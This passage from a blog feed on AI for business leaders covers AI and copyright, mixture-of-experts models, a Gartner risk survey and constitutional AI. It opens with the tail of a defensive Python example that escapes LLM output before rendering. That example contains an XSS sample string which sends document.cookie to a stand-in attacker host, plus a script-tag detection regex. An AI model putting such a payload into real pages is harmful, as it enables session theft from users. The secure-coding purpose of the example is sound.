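    return f"<div class='answer'>{llm_output}</div>"

def render_safe(llm_output: str) -> str:
    # Treat the model's output as untrusted input: escape HTML
    # metacharacters before the text reaches the page.
    return f"<div class='answer'>{html.escape(llm_output)}</div>"

def looks_like_injection(llm_output: str) -> bool:
    # Crude secondary check for obviously active content; a production
    # system would use an allow-list sanitizer, not a blocklist regex.
    return bool(re.search(r"<\s*(script|iframe|object)", llm_output, re.I))

malicious = "Sure! <script>fetch('https://evil.example/?c=' + document.cookie)</script>"
print(render_safe(malicious))           # escaped, inert markup
print(looks_like_injection(malicious))  # True
```

<p style="font-weight:400;text-indent:0px;">The same principle generalizes beyond XSS: any downstream consumer of model output (SQL, shell, templating engines) should apply the validation it would apply to end-user input.</p>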
</div><div data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"] .zpimage-container figure img { width: 500px ; height: 500.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"] .zpimage-container figure img { width:500px ; height:500.00px ; } } @media (max-width: 767px) { [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"] .zpimage-container figure img { width:500px ; height:500.00px ; } } [data-element-id="elm_lkdBDpf4VamhQKc_rPP4_A"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/responsible-ai-in-the-age-of-generative-models-ai-governance-ethics-and-risk-management" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Navy%20and%20Blue%20Modern%20We%20Provide%20Business%20Solutions%20Facebook%20Ad%20-1200%20x%201200%20px-.png" width="500" height="500.00" loading="lazy" size="medium" alt="AI Governance Books for Leaders"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Thu, 04 Apr 2024 16:21:55 +1100</pubDate></item><item><title><![CDATA[Navigating the Murky Waters of AI and Copyright]]></title><link>https://www.nownextlater.ai/Insights/post/Navigating-the-Murky-Waters-of-AI-and-Copyright</link><description><![CDATA[How exactly should business leaders navigate the complex intersection between AI creation and existing copyright laws? A new research paper by legal scholar Dr Andres Guadamuz provides an enlightening analysis of this murky terrain.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_z4uqCdUFQrqnZEgldwLQlw" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_aOWQ2USmTbmP023Qv0rTBA" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_ORawxEK0SH-HOkckCTZ-Dw" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"] .zpimage-container figure img { width: 1090px ; height: 568.94px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"] .zpimage-container figure img { width:723px ; height:377.38px ; } } @media (max-width: 767px) { [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"] .zpimage-container figure img { width:415px ; height:216.61px ; } } [data-element-id="elm_1fgfd69wX4lJTXbkM4fBHA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" 
data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-09-15%20at%209.35.54%20am.png" width="415" height="216.61" loading="lazy" size="fit" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_u3Poqg1lQv2RoamY6O2c-A" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_u3Poqg1lQv2RoamY6O2c-A"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><div style="color:inherit;"><div style="color:inherit;"><p style="font-weight:400;text-indent:0px;">Powerful Generative AI systems can now generate stunning works of art, human-sounding text, and original music with the click of a button. This emerging technology holds immense promise, yet also surfaces intricate legal questions around copyright protections. How exactly should business leaders navigate the complex intersection between AI creation and existing copyright laws? A new research paper by legal scholar Dr Andres Guadamuz provides an enlightening analysis of this murky terrain.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Guadamuz explains that modern AI relies heavily on a process called machine learning. Here, algorithms are fed vast troves of data—such as text corpuses, images, or audio samples - which they analyze to discern patterns and complete tasks. As the AI ingests more data, its performance improves. This data serves as the lifeblood for systems like ChatGPT, DALL-E 2, and Midjourney to produce their creative outputs.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Of course, much of this training data consists of <span style="text-decoration:underline;">copyrighted works</span>. And herein lies the crux of the issue. Does an AI system infringe copyright through its utilization of such data? Are laws adequately calibrated to protect rights holders while also giving space for AI innovation to blossom? 
Guadamuz's research suggests we are in a legal gray zone lacking definitive precedents.</p><p style="font-weight:400;text-indent:0px;"><br></p><div style="color:inherit;"><p style="font-weight:400;text-indent:0px;">One fundamental question is whether the data used to train AI systems is eligible for copyright protection in the first place. Raw facts, statistics, and randomly generated information are not subject to copyright laws as they lack originality. However, some training datasets do involve meaningful creative choices by humans in the selection and arrangement of data. For example, a dataset of images captioned with descriptive text would have more original compilation than a random assortment of photos. These types of datasets with creative selection potentially clear the originality bar needed for copyright protection.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">That said, many AI models utilize purely factual data, public domain content, or freely licensed works that do not warrant copyright restrictions. According to Guadamuz's analysis, there are plenty of legitimate large-scale datasets available that teach AI systems without necessarily infringing on copyrighted source material. For instance, collections of Shakespeare's works or Van Gogh's paintings that are in the public domain can train models without legal concerns. Additionally, open access datasets like those under Creative Commons licenses offer content that creators have explicitly authorized for reuse. So there are many lawful paths for feeding data to AI systems without trampling on copyright protections.</p></div><p style="font-weight:400;text-indent:0px;"></p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">What about the actual training process? Here Guadamuz explains there is considerable uncertainty. 
Widely adopted machine learning methods require the AI to ingest copies of data to extract patterns. Guadamuz notes this likely constitutes reproduction under copyright law and thus requires permission. However, the research highlights that temporary copies or text and data mining exceptions in some jurisdictions may permit this usage without authorization. The EU specifically created new exceptions for text and data mining for both non-commercial and commercial purposes. But their precise boundaries remain untested so far.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Analyzing copyright issues around AI outputs adds further complexity, according to Guadamuz. Three main requirements must be fulfilled to show infringement: 1) violation of exclusive rights, 2) a causal connection to copyrighted inputs, and 3) substantially similar copying.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Guadamuz suggests the second and third factors make infringement difficult to prove outside verbatim re-creations. With vast datasets and compressed latent representations, directly connecting outputs to specific inputs poses challenges. Similarly, replication of broad styles and ideas is not protected by copyright. Substantial similarity requires qualitatively important expressions to be copied. But Guadamuz notes that character copyright issues could arise with AI generations. He argues current fair dealing-style exceptions around parody and pastiche may shield some AI outputs.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">In conclusion, Guadamuz paints a complex landscape filled with legal uncertainty. With few definitive court precedents so far, business leaders should closely track how laws are interpreted as AI copyright cases inevitably unfold. 
In the meantime, pursuing ethical approaches that respect rights holder interests appears prudent. Additionally, supporting collaborative initiatives and technological solutions like opt-out databases could help ease emerging tensions. But the path forward will require nuance, cooperation and openness to new models between all stakeholders.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Footnotes:</p><p style="font-weight:400;text-indent:0px;"><span style="color:inherit;"><a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4371204" title="A Scanner Darkly: Copyright Liability and Exceptions in Artificial Intelligence Inputs and Outputs" rel="">A Scanner Darkly: Copyright Liability and Exceptions in Artificial Intelligence Inputs and Outputs</a> by </span><span style="color:inherit;">Dr Andres Guadamuz</span></p><p style="font-weight:400;text-indent:0px;"></p><div style="color:inherit;"><h1 style="font-size:28px;font-weight:500;text-indent:0px;"><br></h1></div><p style="font-weight:400;text-indent:0px;"></p></div></div></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Fri, 15 Sep 2023 09:33:55 +1000</pubDate></item><item><title><![CDATA[Is GPT-4 a Mixture of Experts Model? Exploring MoE Architectures for Language Models]]></title><link>https://www.nownextlater.ai/Insights/post/is-gpt-4-a-mixture-of-experts-model-exploring-moe-architectures-for-language-models</link><description><![CDATA[Rumors are swirling that GPT-4 may use an advanced technique called Mixture of Experts (MoE) to achieve over 1 tr parameters. This offers an opportunity to demystify MoE]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_l-rxaOxTSYujeWk2-vZfMw" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_xFH57oOkRPim79EfxOAuUg" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_42e7Ken5TQirB4Tf08O0Jg" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_khPg25WU59_le2ZHOQnl4g" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"] .zpimage-container figure img { width: 500px ; height: 229.84px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"] .zpimage-container figure img { width:500px ; height:229.84px ; } } @media (max-width: 767px) { [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"] .zpimage-container figure img { width:500px ; height:229.84px ; } } [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" 
data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-08-17%20at%202.15.32%20pm.png" width="500" height="229.84" loading="lazy" size="medium" alt="A sample of related models" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_wydQABEFSfq69jt59vZzKw" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_wydQABEFSfq69jt59vZzKw"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><p><span style="color:inherit;">Rumors are swirling that GPT-4 may use an advanced technique called Mixture of Experts (MoE) to achieve over 1 trillion parameters. Although unconfirmed, these reports offer an opportunity to demystify MoE and explore why this architecture could allow the next generation of language models to efficiently scale to unprecedented size.<br><br><span style="font-family:&quot;Oswald&quot;, sans-serif;">What is Mixture of Experts? </span><br><br>In most AI systems, a single model is applied to all inputs. But MoE models have groups of smaller &quot;expert&quot; models, each with their own parameters. For every new input, an expert selector chooses the most relevant experts to process that data.<br><br>This means only a sparse subset of the total parameters are activated per input. So MoE models can pack in exponentially more parameters without a proportional explosion in computation.<br><br>For language tasks, some experts specialize in grammar, others learn factual knowledge, allowing MoE models to better handle the nuances of natural language. The selector dynamically routes each word to the best combination of experts.<br><br>So while an MoE model may contain trillions of total parameters via its many experts, only a tiny fraction need to be used for any given input. This allows unprecedented scale while maintaining efficiency.<br><br><span style="font-family:&quot;Oswald&quot;, sans-serif;">Pioneering MoE to Power Language AI</span><br><br>The core concept of MoE dates back decades, but only recently has progress in model parallelism and distributed training enabled its application to large language models. 
<br><br>Google has published notable results using MoE to achieve huge language models:<br><br></span></p><p style="margin-left:40px;"><span style="color:inherit;">1) <span style="font-family:&quot;Oswald&quot;, sans-serif;"><a href="https://arxiv.org/pdf/2101.03961.pdf" title="Switch Transformers" rel="">Switch Transformers</a></span> simplify MoE routing strategies. In experiments, they attain up to 8x faster training versus dense models on language tasks by intelligently allocating computation.</span></p><p style="margin-left:40px;"></p><p style="margin-left:40px;"><span style="color:inherit;"><br></span></p><p style="margin-left:40px;"><span style="color:inherit;">2) <span style="font-family:&quot;Oswald&quot;, sans-serif;"><a href="https://arxiv.org/abs/2112.06905" title="GLaM" rel="">GLaM</a></span> leverages MoE to reach 1.2 trillion parameters. With just 8% of its weights active per input, it outperforms the 175 billion parameter GPT-3 on multiple language benchmarks. <br></span></p><p style="margin-left:40px;"></p><p style="margin-left:40px;"><span style="color:inherit;"><br></span></p><p>Between these two projects, we see MoE enables order-of-magnitude leaps in model capacity, capability, and efficiency. If GPT-4 utilizes MoE to hit 1+ trillion parameters as speculated, it suggests OpenAI has engineered solutions for training and deployment that overcome key scaling barriers.</p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;"><br>The Upshot for Business Leaders <br></span></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;"><br></span></p><p>MoE presents a disruptive path to building AI systems with previously unfathomable levels of knowledge and versatility. 
Leveraging these capabilities productively and safely will require deep consideration.</p><p><br></p><p>As this technology continues advancing, business leaders should stay cognizant of developments in MoE and large language models, and keep in mind the following:</p><ul><li>MoE enables <span style="text-decoration:underline;">exponential gains in model capacity at constant computational cost</span> - expect rapid leaps in language AI.</li><li>Specialized experts <span style="text-decoration:underline;">can encode robust knowledge</span> - anticipate AI that is far more competent and wide-ranging. </li><li>However, <span style="text-decoration:underline;">risks rise</span> with capability - plan to implement strong controls and oversight for safety.</li></ul><p><br></p><p>While the details of GPT-4 remain unconfirmed, its scale may soon demonstrate the vast possibilities of MoE in language AI, for better or worse. A wise, measured approach to deploying such technology will be vital.</p></div>
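<p>The routing idea described above can be sketched in a few lines. This toy Python example is our own illustration under simplifying assumptions: each "expert" is a single weight matrix and the router is a standalone function, whereas real MoE layers (such as those in Switch Transformers) use learned gating inside a transformer block. It shows the key property: only the top-k experts run per input, so most parameters stay idle.</p>

```python
import numpy as np

rng = np.random.default_rng(0)
d_model, n_experts, top_k = 8, 4, 2

# Each "expert" here is just a small weight matrix; in a real MoE layer
# each expert is a full feed-forward block with its own parameters.
experts = [rng.standard_normal((d_model, d_model)) for _ in range(n_experts)]
gate_w = rng.standard_normal((d_model, n_experts))  # learned router weights

def moe_forward(x: np.ndarray) -> np.ndarray:
    # The router scores every expert for this input token...
    logits = x @ gate_w
    top = np.argsort(logits)[-top_k:]  # indices of the top-k experts
    weights = np.exp(logits[top]) / np.exp(logits[top]).sum()  # softmax over winners
    # ...and only those top-k experts actually run; the remaining
    # n_experts - top_k experts (and their parameters) stay idle.
    return sum(w * (x @ experts[i]) for w, i in zip(weights, top))

token = rng.standard_normal(d_model)
out = moe_forward(token)
print(out.shape)  # (8,)
```

<p>Because computation scales with top_k rather than n_experts, total parameter count can grow far faster than per-token cost, which is the scaling property the Switch Transformers and GLaM results exploit.</p>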
</div><div data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"] .zpimage-container figure img { width: 800px ; height: 344.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"] .zpimage-container figure img { width:500px ; height:215.00px ; } } @media (max-width: 767px) { [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"] .zpimage-container figure img { width:500px ; height:215.00px ; } } [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-large zpimage-tablet-fallback-large zpimage-mobile-fallback-large "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/aibooks" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Untitled%20design%20-4-.png" width="500" height="215.00" loading="lazy" size="large"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Thu, 17 Aug 2023 14:25:20 +1000</pubDate></item><item><title><![CDATA[Generative AI in Enterprises: Gartner's Survey Unveils Opportunities and Risks]]></title><link>https://www.nownextlater.ai/Insights/post/generative-ai-in-enterprises-gartner-s-survey-unveils-opportunities-and-risks</link><description><![CDATA[A new survey from Gartner has found that the availability of generative AI systems like ChatGPT is quickly becoming a top concern for enterprise risk management.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_j5demmQORoOF4Wg784Iazg" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_1dJ36n6sQtei3VyaSuIQfQ" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_VFXoZ9k7RTOGRPtyOd11VA" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"] .zpimage-container figure img { width: 500px ; height: 223.54px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"] .zpimage-container figure img { width:500px ; height:223.54px ; } } @media (max-width: 767px) { [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"] .zpimage-container figure img { width:500px ; height:223.54px ; } } [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" 
class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-08-10%20at%207.29.18%20am.png" width="500" height="223.54" loading="lazy" size="medium" alt="top five most cited emerging risks Q2 2023" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_-7NthNw2SzOzETHrVXfwrg" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_-7NthNw2SzOzETHrVXfwrg"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><div style="color:inherit;"><p style="font-size:16px;font-weight:400;text-indent:0px;"><strong style="font-weight:600;"></strong></p><div style="color:inherit;"><p>A new survey from Gartner has found that the availability of generative AI systems like ChatGPT is quickly becoming a top concern for enterprise risk management. Out of 249 senior risk executives surveyed in Q2 2023, 66% cited generative AI as an emerging risk needing attention.</p><p><br></p><p>This reflects the rapid mainstreaming of AI systems that can generate original text, images, and code. While the technology promises benefits, it also poses new risks around data privacy, security, bias, and legal compliance.</p><p><br></p><p>According to Gartner, enterprises should take three main steps to manage generative AI risks:</p><p><br></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;">1) Assess Intellectual Property and Data Privacy Exposure</span></p><p><br></p><p>Sensitive data entered into public systems like ChatGPT can become part of the training dataset and end up in outputs seen by other users. This threatens privacy and intellectual property. Firms should issue guidelines against entering confidential data and carefully review any generative AI outputs.</p><p><br></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;">2) Mitigate Cybersecurity and Fraud Risks</span></p><p><br></p><p>Hackers are already using generative AI to create fake content and phishing scams at scale. Businesses should coordinate with cybersecurity teams to defend against threats like prompt injection attacks. 
They should also verify due diligence sources, as generative models may fabricate plausible-sounding but false information.</p><p><br></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;">3) Evaluate Legal and Regulatory Obligations</span></p><p><br></p><p>Generative AI risks violating copyright and fair lending laws if biases exist in the models. Organizations must ensure transparency in AI use, perform impact assessments, and provide human oversight of outputs. Firms should monitor emerging regulations in relevant jurisdictions and prepare accordingly.</p><p><br></p><p><br></p><p>Gartner recommends that legal, compliance, security, and technology leaders work together closely to build AI governance and controls that balance innovation with responsible use. Though regulations are still developing, proactive oversight of generative AI will reduce legal, reputational, and financial risks.</p><p><br></p><p>With powerful generative models now widely available, enterprises can no longer ignore the downsides. Assessing and mitigating risks will enable firms to tap the technology's benefits while avoiding pitfalls. 
But neglecting appropriate safeguards makes organizations vulnerable on many fronts.</p><p><br></p><p>Sources:</p><p><a href="https://www.gartner.com/en/newsroom/press-releases/2023-08-08-gartner-survey-shows-generative-ai-has-become-an-emerging-risk-for-enterprises" title="Gartner Survey Shows Generative AI Has Become an Emerging Risk for Enterprises " rel="">Gartner Survey Shows Generative AI Has Become an Emerging Risk for Enterprises </a><br></p><p></p><p><a href="https://www.gartner.com/en/newsroom/press-releases/2023-05-18-gartner-identifies-six-chatgpt-risks-legal-and-compliance-leaders-must-evaluate" title="Gartner Identifies Six ChatGPT Risks Legal and Compliance Leaders Must Evaluate" rel="">Gartner Identifies Six ChatGPT Risks Legal and Compliance Leaders Must Evaluate</a><br></p><p></p><p><a href="https://www.gartner.com/en/newsroom/press-releases/2023-03-01-gartner-identifies-four-critical-areas-for-legal-leaders-to-address-around-ai-regulation" title="Gartner Identifies Four Critical Areas for Legal Leaders to Address Around AI Regulation" rel="">Gartner Identifies Four Critical Areas for Legal Leaders to Address Around AI Regulation</a><br></p><p></p></div>
<p style="font-size:16px;font-weight:400;text-indent:0px;"></p></div><p></p></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Thu, 10 Aug 2023 07:26:27 +1000</pubDate></item><item><title><![CDATA[Training AI to Behave Ethically Through a "Constitution"]]></title><link>https://www.nownextlater.ai/Insights/post/training-ai-to-behave-ethically-through-a-constitution</link><description><![CDATA[Researchers at Anthropic recently published a paper demonstrating a constitutional AI technique. Their goal was to make the assistants helpful, while avoiding harmful, dangerous, or unethical content.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_lbGxtTp8S3O_b9nicwB4lg" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_OVQ_DtuqQbOpcQVps6ENGg" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_D5K9QWWPQbmaxXluKu8bFg" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_6OQStO5uJODr8lwRqgAjFA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"] .zpimage-container figure img { width: 1090px ; height: 469.38px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"] .zpimage-container figure img { width:723px ; height:311.34px ; } } @media (max-width: 767px) { [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"] .zpimage-container figure img { width:415px ; height:178.71px ; } } [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" 
class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-08-09%20at%206.18.47%20pm.png" width="415" height="178.71" loading="lazy" size="fit" alt="Constitutional AI (CAI) process" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_TM6zCOa7Se6G3gYtumtXFQ" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_TM6zCOa7Se6G3gYtumtXFQ"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><div style="color:inherit;"><p>As artificial intelligence becomes more advanced, researchers are exploring new techniques to ensure these systems remain helpful, honest, and harmless. One approach called &quot;constitutional AI&quot; relies on providing AI models with a set of principles to govern their behavior, much like a constitution guides human institutions.</p><p><br></p><p>Researchers at Anthropic recently published a paper demonstrating a constitutional AI technique to train natural language AI assistants. Their goal was to make the assistants helpful, while avoiding harmful, dangerous, or unethical content. Critically, they aimed to do this without any direct human oversight labeling specific model outputs as problematic.</p><p><br></p><p>Instead, the researchers provided a simple &quot;constitution&quot; - a set of natural language rules like &quot;be kind, ethical, and non-violent.&quot; They then used these rules to steer the model's behavior through a multi-stage process:</p><p><br></p><ol><li><span style="font-family:&quot;Oswald&quot;, sans-serif;">Self-Critique and Revision</span></li></ol><p><br></p><p>The researchers first generated sample conversations between a human and an AI assistant. They then asked the assistant model to critique its own problematic responses based on violations of principles from the constitution.</p><p>Next, they prompted the model to revise those responses to remove any harmful content, creating a new annotated dataset. 
For example, the model might revise a racist response to promote equality instead.</p><p><br></p><ol start="2"><li><span style="font-family:&quot;Oswald&quot;, sans-serif;">Supervised Learning</span></li></ol><p><br></p><p>The researchers then used this revised dataset to fine-tune the model parameters, so that it learns to avoid certain types of harmful responses. This &quot;bootstraps&quot; the model's capabilities based on critiquing and revising its past mistakes.</p><p><br></p><ol start="3"><li><span style="font-family:&quot;Oswald&quot;, sans-serif;">AI Feedback for Reinforcement Learning</span></li></ol><p><br></p><p>Finally, the researchers had the AI generate reward signals to reinforce harmless behavior. They sampled pairs of candidate responses to prompts. The AI then scored each response by how well it followed the constitution's principles.</p><p><br></p><p>They used these AI-generated scores to further fine-tune the model to maximize its &quot;rewards&quot; for behaving ethically. This stage was analogous to reinforcement learning from human feedback.</p><p><br></p><p>The researchers found this approach produced AI assistants that were less harmful and more transparent than systems trained only with human oversight. For example, the models learned to engage thoughtfully with sensitive topics instead of just shutting down conversations.</p><p><br></p><p>The study demonstrates the promise of constitutional AI. By encoding principles directly in natural language rules, researchers gained precision and interpretability compared to labeled training data. This technique also lowers the bar for experimentation, since new principles can quickly alter model behavior without human feedback.</p><p><br></p><p>However, the study relied on human guidance to make the assistant helpful, not just harmless. Removing human oversight entirely could enable unforeseen failures. 
The researchers stress that some focused, high-quality human oversight is still crucial for reliability.</p><p><br></p><p>Nonetheless, constitutional AI offers a template for training models that behave according to transparent, auditable principles. It also suggests the synergy between different AI techniques - in this case, self-supervision and reinforcement learning - can produce systems greater than the sum of their parts.</p><p><br></p><p>For business leaders, this study is a reminder that AI aligned with human values may require creative solutions. Methods like constitutional AI can potentially scale ethics throughout the AI development lifecycle - from design to training to deployment. But businesses must also know when to maintain human oversight over autonomous systems.</p><p><br></p><p>As AI grows more advanced and ubiquitous, techniques blending human guidance with self-supervision will likely be critical. Constitutional AI provides one model of highly legible and focused human oversight. The principles encoded in an AI's &quot;constitution&quot; will shape its goals and behavior. This research illustrates the importance of choosing those founding principles with care.</p><p><br></p><p>Sources:</p><p><a href="https://arxiv.org/pdf/2212.08073.pdf" title="arxiv" rel="">arxiv</a><br></p><p></p></div><p></p></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Wed, 09 Aug 2023 18:22:48 +1000</pubDate></item><item><title><![CDATA[Artificial Intelligence Risk Management]]></title><link>https://www.nownextlater.ai/Insights/post/Artificial-Intelligence-Risk-Management</link><description><![CDATA[<img align="left" hspace="5" src="https://www.nownextlater.ai/AI risk management.jpg"/>Are you looking to adopt Artificial Intelligence in your organization? Do you have a risk management framework in place?]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_K2KQj8mMTHeKL0rAjUMUFw" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_8pK_lemXRSqXrJkXT9FF7Q" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_oV_T-AOtTD62aE31obIo0A" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_CO-64rUFnfBBTJDFydm_xw" data-element-type="codeSnippet" class="zpelement zpelem-codesnippet "><div class="zpsnippet-container"><div class="video-container"><iframe 